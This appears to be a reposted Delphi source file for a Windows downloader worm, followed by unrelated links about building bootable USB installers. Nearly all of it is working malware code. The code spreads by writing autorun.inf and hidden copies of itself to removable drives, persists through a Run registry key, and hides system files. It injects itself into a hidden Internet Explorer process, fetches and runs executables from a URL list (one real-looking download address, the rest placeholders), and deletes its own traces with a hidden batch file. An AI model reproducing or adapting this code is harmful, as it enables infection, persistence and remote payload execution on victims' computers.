一个含U盘感染的下载者代码
//一个含U盘感染的下载者代码2008年08月19日 星期二 00:27program AutoDown;
{$R 'ICON32.RES' 'ICON32.TXT' }
{$IMAGEBASE $17140000}
uses
Windows, SysUtils, wininet, mmsystem, messages;
var
htimer: integer;
msg: tmsg;
dw: bool;
url1: pchar =
('https://www.wendangku.net/doc/3e18087088.html,/xx.exe');
url2: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url3: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url4: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url5: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url6: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url7: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url8: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url9: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url10: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url11: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url12: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url13: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url14: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url15: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
LongWo rd; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle;
ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directo ry:
PChar; ShowCmd: Integer): Cardinal; stdcall;
procedure RunInject(InjType: integer); stdcall; fo rward;
const
ExeName = 'system.exe';
faReadOnly = $00000001;
faHidden = $00000002;
faSysFile = $00000004;
faVolumeID = $00000008;
faDirecto ry = $00000010;
faArchive = $00000020;
faAnyFile = $0000003F;
Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
'9');
Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
'j',
'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z');
var
i, Len, infsize: integer;
exefile, OpenPath, DriverList, TempFile: string;
NoDel: integer;
sa1, sa2, MyCurso r: THandle;
type
TFileName = type string;
TSearchRec = reco rd
Time: Integer;
Size: Integer;
Attr: Integer;
Name: TFileName;
ExcludeAttr: Integer;
FindHandle: THandle platfo rm;
FindData: TWin32FindData plat
fo rm;
end;
LongRec = packed reco rd
case Integer of
0: (Lo, Hi: Wo rd);
1: (Wo rds: array[0..1] of Wo rd);
2: (Bytes: array[0..3] of Byte);
end;
{$R *.RES}
function FileExists(const FileName: string): Boolean;
var
Handle: THandle;
FindData: TWin32FindData;
begin
Handle := FindFirstFileA(PChar(FileName), FindData);
result := Handle <> INVALID_HANDLE_VALUE;
if result then
begin
CloseHandle(Handle);
end;
end;
function FindMatchingFile(var F: TSearchRec): Integer;
var
LocalFileTime: TFileTime;
begin
with F do
begin
while FindData.dwFileAttributes and ExcludeAttr <> 0 do
if not FindNextFile(FindHandle, FindData) then
begin
Result := GetLastErro r;
Exit;
end;
FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
LongRec(Time).Lo);
Size := FindData.nFileSizeLow;
Attr := FindData.dwFileAttributes;
Name := FindData.cFileName;
end;
Result := 0;
end;
procedure FindClose(var F: TSearchRec);
begin
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Windows.FindClose(F.FindHandle);
F.FindHandle := INVALID_HANDLE_VALUE;
end;
end;
function FindFirst(const Path: string; Attr: Integer;
var
F: TSearchRec): Integer;
const
faSpecial = faHidden o r faSysFile o r faVolumeID o r faDirecto ry;
begin
F.ExcludeAttr := not Attr and faSpecial;
F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
Result := FindMatchingFile(F);
if Result <> 0 then FindClose(F);
end
else
Result := GetLastErro r;
end;
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastErro r;
end;
function deletefile(const FileName: string): Integer;
begin
Result := GetFileAttributes(PChar(FileName));
end;
function GetDirecto ry(dInt: integer): string;
var
s: array[0..255] of Char;
begin
case dInt of
0: GetWindowsDirecto ry(@s, 256); //Windows安装文件夾所存在的路径
1: GetSystemDirecto ry(@s, 256); //系统文件夾所存在的路径
2: GetTempPath(256, @s); //Temp文件夾所存在的路径
end;
if dInt = 2 then
result := string(s)
else
result := string(s) + '';
end;
function ExtractFilePath(FileName: string): string;
begin
Result := '';
while ((Pos('', FileName) <> 0) o r (Pos('/', FileName) <> 0)) do
begin
Result := Result + Copy(FileName, 1, 1);
Delete(FileName, 1, 1);
end;
end;
function ExtractFileName(FileName: string): string;
begin
while Pos('', FileName) <> 0 do
Delete(FileName, 1, Pos('', FileName));
while Pos('/', FileName) <> 0 do
Delete(FileName, 1, Pos('/', FileName));
Result := FileName;
end;
function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
var
regkey: hkey;
be
gin
result := false;
RegCreateKey(key, PChar(subkey), regkey);
if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
function CompareText(const S1, S2: string): Integer; assembler;
asm
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI,EAX
MOV EDI,EDX
o r EAX,EAX
JE @@0
MOV EAX,[EAX-4]
@@0: o r EDX,EDX
JE @@1
MOV EDX,[EDX-4]
@@1: MOV ECX,EAX
CMP ECX,EDX
JBE @@2
MOV ECX,EDX
@@2: CMP ECX,ECX
@@3: REPE CMPSB
JE @@6
MOV BL,BYTE PTR [ESI-1]
CMP BL,'a'
JB @@4
CMP BL,'z'
JA @@4
SUB BL,20H
@@4: MOV BH,BYTE PTR [EDI-1]
CMP BH,'a'
JB @@5
CMP BH,'z'
JA @@5
SUB BH,20H
@@5: CMP BL,BH
JE @@3
MOVZX EAX,BL
MOVZX EDX,BH
@@6: SUB EAX,EDX
POP EBX
POP EDI
POP ESI
end;
procedure DelMe;
var
BatchFile: TextFile;
BatchFileName: string;
ProcessInfo: TProcessInfo rmation;
StartUpInfo: TStartupInfo;
begin
BatchFileName := ExtractFilePath(GetDirecto ry(2)) + '~Lying.bAt';
AssignFile(BatchFile, BatchFileName);
Rewrite(BatchFile);
Writeln(BatchFile, ':tRy');
Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
Writeln(BatchFile, 'dEl %0 /A');
CloseFile(BatchFile);
SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil,
False, IDLE_PRIo rITY_CLASS, nil, nil, StartUpInfo,
ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function GetDrives: string;
var
DiskType: Wo rd;
D: Char;
Str: string;
i: Integer;
begin
fo r i := 1 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str)); //得到本地磁盘,网络磁盘和移动磁盘...
if {(DiskType = DRIVE_FIXED) o r (DiskType = DRIVE_REMOTE) o r} (DiskType =
DRIVE_REMOVABLE) then
Result := Result + D;
end;
end;
function SendMetoDriver(const DriveName: string): Boolean;
var
InfFile, Mmfile: string;
InfText: TextFile;
begin
InfFile := DriveName + 'Auto run.inf';
MmFile := DriveName + ExeName;
if (not FileExists(InfFile)) then
begin
AssignFile(InfText, InfFile);
try
ReWrite(InfText);
WriteLn(InfText, '[Auto run]');
WriteLn(InfText, 'open=' + ExeName);
WriteLn(InfText, 'shellexecute=' + ExeName);
Wr
iteLn(InfText, 'shellAutocommand=' + ExeName);
finally
CloseFile(InfText);
end;
SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
if (not FileExists(MmFile)) then
begin
CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
end;
end;
function IsFileInUse(fName: string): boolean;
var
HFileRes: HFILE;
begin
Result := false;
if not FileExists(fName) then
exit;
HFileRes := CreateFile(pchar(fName), GENERIC_READ o r GENERIC_WRITE,
0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_No rMAL, 0);
Result := (HFileRes = INVALID_HANDLE_VALUE);
if not Result then
CloseHandle(HFileRes);
end;
procedure dir;
begin
if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
try
createdir(pchar('C:Program FilesWindowsUpdate'));
except
end;
end;
procedure regme;
begin
SetRegValue(HKEY_LOCAL_MACHINE,
'SoftWareMicrosoftWindowsCurrentVersionpoliciesExplo rerRun', 'Lying', exefile); //自启动
SetRegValue(HKEY_LOCAL_MACHINE,
'SOFTWAREMicrosoftWindowsCurrentVersionExplo rerAdvancedFolderHiddenSHOWALL',
'CheckedValue', '2'); //强制隐藏系统文件
end;
procedure infect();
var
i, len: integer;
driverlist: string;
begin
DriverList := GetDrives;
Len := Length(DriverList);
fo r i := Len downto 1 do
SendMetoDriver(DriverList[i] + ':');
end;
function GetOnlineStatus: Boolean;
var
ConTypes: Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
Result := False
else
Result := True;
end;
procedure GetDebugPrivs; //提升进程权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dwo rd;
begin
if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES o r
TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWo rD); stdcall;
//网络连接时启动各种功能和下载
begin
try
infect;
except
end;
if GetOnlineStatus and not dw then
begin
try
GetDebugPrivs;
RunInject(1); //1 注入iexplo re.exe
except
end;
dw := true;
end;
//timeKillEvent(hTimer3);
end;
procedure infecttimer; stdcall;
begin
//Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure AutoAndw0rM;
var
tid: dwo rd;
begin
dw := false;
if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
CreateMutex(nil, TRUE, 'dx'); //TRUE 标明
该进程拥有此 Mutex 对象
if (GetLastErro r = ERRo r_ALREADY_EXISTS) then exit; //Mutex 对象是否存在
dir;
regme; //加载注册表
CreateThread(nil, 0, @infecttimer, nil, 0, TID);
while (GetMessage(Msg, 0, 0, 0)) do
;
end;
procedure Download; //下载过程
begin
// dw := true; //下载了一次
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');
{if not directo ryexists(pchar('C:Program FilesWindowsUpdate')) then
try
createdir(pchar('C:Program FilesWindowsUpdate'));
except
end; }
try
Downfile(nil,pchar(url1),'C:Program FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0,'open','C:Program FilesWindowsUpdate1.exe',nil,nil,5);
except
end;
{Downfile(nil, pchar('http://www.mybr.o rg/test/a.exe'),
'C:Program FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate1.exe', nil, nil, 5);
}
try
Downfile(nil, pchar(url2), 'C:Program FilesWindowsUpdate2.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate2.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url3), 'C:Program FilesWindowsUpdate3.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate3.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url4), 'C:Program FilesWindowsUpdate4.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate4.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url5), 'C:Program FilesWindowsUpdate5.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate5.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url6), 'C:Program FilesWindowsUpdate6.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate6.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url7), 'C:Program FilesWindowsUpdate7.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate7.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url8), 'C:Program FilesWindowsUpdate8.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate8.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url9), 'C:Program FilesWindowsUpdate9.exe', 0, nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate9.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url10), 'C:Program FilesWindowsUpdate10.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate10.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url11), 'C:Program FilesWindowsUpdate11.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate11.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url12), 'C:Program FilesWindowsUpdate12.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate12.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url13), 'C:Program FilesWindowsUpdate13.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate13.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url14), 'C:Program FilesWindowsUpdate14.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate14.exe', nil, nil, 5);
except
end;
try
Downfile(nil, pchar(url15), 'C:Program FilesWindowsUpdate15.exe', 0,
nil);
ShellRun(0, 'open', 'C:Program FilesWindowsUpdate15.exe', nil, nil, 5);
except
end;
//ExitProcess(0);
end;
procedure Inject(ProcessHandle: longwo rd; EntryPoint: pointer); //注入
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longwo rd;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) +
PImageDosHeader(Module)._lfanew +
SizeOf(dwo rd) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT o r
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemo ry(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure setme;
begin
if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
(CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
begin
sa1 := Findwindow('CabinetWClass', nil); //我的电脑
if GetFo regroundwindow <> sa1 then exit;
sa1 := findwindowex(sa1, 0, 'Wo rkerW', nil);
sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
sa1 := findwindowex(sa1, 0, 'Edit', nil);
OpenPath := Copy(ParamStr(0), 1, 3);
SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
SendMessage(sa2, WM_LBUTTONUP, 0, 0);
SendMessage(sa1, WM_KILLFOCUS, 0, 0); //去掉焦点,避免怀疑...
NoDel := 1;
end;
if IsFileInUse(exefile) = false then
begin
SetFileAttributes(pchar(exefile), 0);
DeleteFile(pchar(exefile));
Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
FILE_ATTRIBUTE_SYSTEM);
winexec(pchar(exefile), sw_hide);
end;
//AutoAndw0rM;
if (NoDel <> 1) then DelMe; //如果nodel这个变量<>1,就自删除
ExitProcess(0);
end;
procedure RunInject(InjType: integer);
var
ProcessHand
le, PID: longwo rd;
begin
if InjType = 0 then //注入explo rer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else //注入iexplo re.exe
begin
//createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar('C:Program FilesInternet Explo rerIEXPLo rE.EXE'), sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
//sleep(500);
//ExtDelMe;
end;
end;
begin
exefile := Pchar(GetDirecto ry(2) + ExeName);
if CompareText(ParamStr(0), exefile) <> 0 then
setme
else
begin
AutoAndw0rM;
// ExitProcess(0);
end;
end.
//调试的时候把o r中间的空格去掉
- ISO文件制作U盘启动盘、系统盘的教程
- (完整版)制作U盘系统安装盘
- 制作U盘系统安装盘
- U盘启动安装系统的制作方法大全(详细图解)
- 用命令制作windows系统U盘启动盘(U盘安装盘)
- 教你用U盘制作双系统启动盘
- 教你如何用UltraISO制作U盘系统安装盘(图文教程)
- 图文详解利用UltraISO 制作USB系统启动盘
- U盘做系统盘操作流程
- 教你制作U盘启动盘(WINPE)、如何用U盘做系统Word版
- U盘制作系统盘的基本方法
- U盘制作启动盘重装系统全过程
- 用u盘制作系统安装盘
- 如何制作U盘WIN7系统安装盘以及U盘安装操作系统的方法
- 如何利用U盘制作USB系统安装盘(图文详细教程)
- 如何制作U盘启动盘安装XP和Win7
- 如何用u盘做系统
- 教你如何用U大师制作u盘系统安装盘(图文详解)
- 怎么样用U盘做系统盘安装电脑系统【U盘安装系统图解】
- 教你如何用U盘做系统启动盘